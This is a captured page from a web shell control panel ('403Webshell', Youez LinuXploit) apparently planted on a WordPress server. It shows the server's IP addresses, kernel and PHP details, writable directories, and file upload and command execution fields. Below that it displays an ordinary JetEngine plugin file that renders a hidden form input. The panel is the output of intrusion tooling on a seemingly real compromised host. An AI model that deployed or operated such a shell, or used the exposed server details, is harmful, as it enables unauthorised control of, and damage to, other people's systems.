403Webshell
Server IP : 185.143.234.238  /  Your IP : 185.215.232.195
Web Server : nginx/1.22.1
System : Linux server2065 6.1.0-35-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.137-1 (2025-05-07) x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/bcandle/wp-content/plugins/jet-engine/framework/interface-builder/inc/controls/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/bcandle/wp-content/plugins/jet-engine/framework/interface-builder/inc/controls/hidden.php
<?php
/**
 * Class for the building ui-hidden elements.
 */

// If this file is called directly, abort.
if ( ! defined( 'WPINC' ) ) {
	die;
}

if ( ! class_exists( 'CX_Control_Hidden' ) ) {

	/**
	 * Class for the building ui-hidden elements.
	 */
	class CX_Control_Hidden extends CX_Controls_Base {

		/**
		 * Default settings.
		 *
		 * @since 1.0.0
		 * @var array
		 */
		public $defaults_settings = array(
			'id'    => 'cx-ui-input-id',
			'name'  => 'cx-ui-input-name',
			'value' => '',
			'label' => '',
			'class' => '',
		);

		/**
		 * Render html UI_Hidden.
		 *
		 * @since 1.0.0
		 */
		public function render() {
			$html = '';

			$classes = array( 'cx-ui-container', 'hide' );

			if ( ! empty( $this->settings['class'] ) ) {
				$classes[] = $this->settings['class'];
			}

			$class = implode( ' ', $classes );

			$html .= '<div class="' . esc_attr( $class ) . '">';
				$html .= '<input type="hidden" id="' . esc_attr( $this->settings['id'] ) . '" class="cx-ui-hidden" name="' . esc_attr( $this->settings['name'] ) . '" value="' . esc_html( $this->settings['value'] ) . '">';
			$html .= '</div>';
			return $html;
		}
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit